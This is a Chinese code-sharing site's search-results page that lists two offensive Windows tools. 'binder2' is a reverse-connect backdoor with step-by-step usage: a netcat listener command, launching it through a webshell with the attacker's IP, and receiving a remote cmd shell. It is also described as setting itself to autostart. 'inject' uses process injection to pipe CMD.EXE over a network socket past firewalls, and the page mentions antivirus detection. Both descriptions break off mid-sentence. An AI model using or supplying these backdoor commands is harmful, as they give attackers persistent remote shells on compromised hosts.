搜索资源列表
binder2
- 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参
inject
- 通过进程注入,将CMD.EXE重定向到网络socket 穿透防火墙,好像能被卡巴截获,呵呵,不懂就别玩了吧! 说白了,没事! -Through the process will be redirected to CMD.EXE network socket penetrate the firewall, if Kabbah can be intercepted, huh, huh, do not know how to play a bar on the other! Put it